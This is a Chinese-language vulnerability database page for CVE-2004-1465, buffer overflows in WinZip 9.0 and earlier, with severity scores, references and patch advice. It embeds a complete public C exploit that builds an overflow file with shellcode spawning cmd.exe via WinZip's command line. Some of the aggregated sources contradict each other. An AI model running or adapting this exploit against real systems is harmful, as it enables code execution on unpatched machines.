CVE-2004-1465
CVSS3.7
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:54:46
NMCOES    

[原文]Multiple buffer overflows in WinZip 9.0 and earlier may allow attackers to execute arbitrary code via multiple vectors, including the command line.


[CNNVD]WinZip未明缓冲区溢出漏洞(CNNVD-200412-348)

        
        Winzip是一款流行的解压工具。
        Winzip存在几个未明安全问题,远程攻击者可以利用这些漏洞进行缓冲区溢出攻击,可能以用户进程权限在系统上执行任意指令。
        问题是对某些特殊文件处理存在缓冲区溢出。另外就是构建特殊的WinZip命令也可以触发缓冲区溢出,目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 3.7 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:winzip:winzip:8.1WinZip 8.1
cpe:/a:winzip:winzip:9.0WinZip 9.0
cpe:/a:winzip:winzip:8.0WinZip 8.0
cpe:/a:winzip:winzip:7.0WinZip 7.0
cpe:/a:winzip:winzip:8.1:sr1WinZip 8.1 SR1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1465
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1465
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-348
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109416099301369&w=2
(UNKNOWN)  BUGTRAQ  20040901 WinZip Unspecified Buffer Overflows May Let Remote or Local Users Execute Arbitrary Code
http://securitytracker.com/id?1011132
(PATCH)  SECTRACK  1011132
http://www.ciac.org/ciac/bulletins/o-211.shtml
(VENDOR_ADVISORY)  CIAC  O-211
http://www.securityfocus.com/bid/11092
(PATCH)  BID  11092
http://www.winzip.com/wz90sr1.htm
(PATCH)  CONFIRM  http://www.winzip.com/wz90sr1.htm
http://xforce.iss.net/xforce/xfdb/17192
(UNKNOWN)  XF  winzip-code-execution(17192)
http://xforce.iss.net/xforce/xfdb/17197
(UNKNOWN)  XF  winzip-command-line-bo(17197)

- 漏洞信息

WinZip未明缓冲区溢出漏洞
低危 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Winzip是一款流行的解压工具。
        Winzip存在几个未明安全问题,远程攻击者可以利用这些漏洞进行缓冲区溢出攻击,可能以用户进程权限在系统上执行任意指令。
        问题是对某些特殊文件处理存在缓冲区溢出。另外就是构建特殊的WinZip命令也可以触发缓冲区溢出,目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        WinZip
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载WinZip 9.0 SR-1:
        
        http://www.winzip.com/wz90sr1.htm

- 漏洞信息 (1034)

WinZIP <= 8.1 Command Line Local Buffer Overflow Exploit (EDBID:1034)
windows local
2005-06-07 Verified
0 ATmaCA
N/A [点击下载]
/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
*
*/

/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define NOP 0x90

void main()
{
        // create crafted command line
        char tmpfile[] = "c:\\wzs45.tmp";
        char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
        char zipandmailpar[] = " -* /zipandmail /@  ";
        char runpar[300];
        int i = 0;
        strcpy(runpar,winzippath);
        strcat(runpar,zipandmailpar);
        strcat(runpar,tmpfile);

        // need for some input file name .tmp but not must to exist
        char inputfile[] = "C:\\someinputfile.ext\n";

        // launch a local cmd.exe
        char shellcode[] =
        "\x55\x8B\xEC\x33\xFF"
        "\x57\x83\xEC\x04\xC6\x45\xF8"
        "\x63\xC6\x45\xF9\x6D\xC6\x45"
        "\xFA\x64\xC6\x45\xFB\x2E\xC6"
        "\x45\xFC\x65\xC6\x45\xFD\x78"
        "\xC6\x45\xFE\x65\xB8"
        "\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
        "\x50\x8D\x45\xF8\x50"
        "\xFF\x55\xF4";

        // create crafted .tmp file
        FILE *di;
        if( (di=fopen(tmpfile,"wb")) == NULL ){
                return;
        }

        for(i=0;i<sizeof(inputfile)-1;i++)
                fputc(inputfile[i],di);

        fprintf(di,"c:\\");

        for(i=0;i<384;i++)
                fputc(NOP,di);


        for(i=0;i<sizeof(shellcode)-1;i++)
                fputc(shellcode[i],di);

        fprintf(di,"\xBF\xAC\xDA\x77");  //EIP - WinXp Sp2 Eng - jmp esp addr
        fprintf(di,"\x90\x90\x90\x90");  //NOPs
        fprintf(di,"\x90\x83\xEC\x74");  //sub esp,0x74
        fprintf(di,"\xFF\xE4\x90\x90");  //jmp esp

        fprintf(di,"\n");

        fclose(di);
        WinExec(runpar,SW_SHOW);
}

// milw0rm.com [2005-06-07]
		

- 漏洞信息

9511
WinZip Multiple Unspecified Overflows
Location Unknown Input Manipulation
Loss of Integrity, Impact Unknown
Exploit Public

- 漏洞描述

Winzip contains flaws that may allow an attacker to execute various overflow attacks. No further details have been provided.

- 时间线

2004-09-01 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 9.0 SR-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

WinZip Multiple Unspecified Buffer Overflow Vulnerabilities
Boundary Condition Error 11092
Yes Yes
2004-09-01 12:00:00 2009-07-12 07:06:00
These issues were disclosed by the vendor.

- 受影响的程序版本

WinZip WinZip 9.0
WinZip WinZip 8.1 SR-1
WinZip WinZip 8.1
WinZip WinZip 8.0
WinZip WinZip 7.0
WinZip WinZip 9.0 SR-1

- 不受影响的程序版本

WinZip WinZip 9.0 SR-1

- 漏洞讨论

WinZip is reported prone to multiple unspecified buffer overflow vulnerabilities. These issues may allow a remote or local attacker to potentially execute arbitrary code on a vulnerable computer. A successful attack may allow an attacker to gain unauthorized access to a computer. The problems likely occur due to insufficient bounds checking when processing zip archives.

A local buffer overflow vulnerability was reported as well. This issue can be triggered through the command line.

WinZip versions 9.0 and prior are affected by these issues.

Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The vendor has released WinZip 9.0 SR-1 to address these issues.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站